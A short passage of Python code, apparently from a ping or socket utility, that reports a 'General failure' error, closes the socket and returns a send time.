self.response.output.append("General failure (%s)" % (e.args[1]))
current_socket.close()
return
return send_time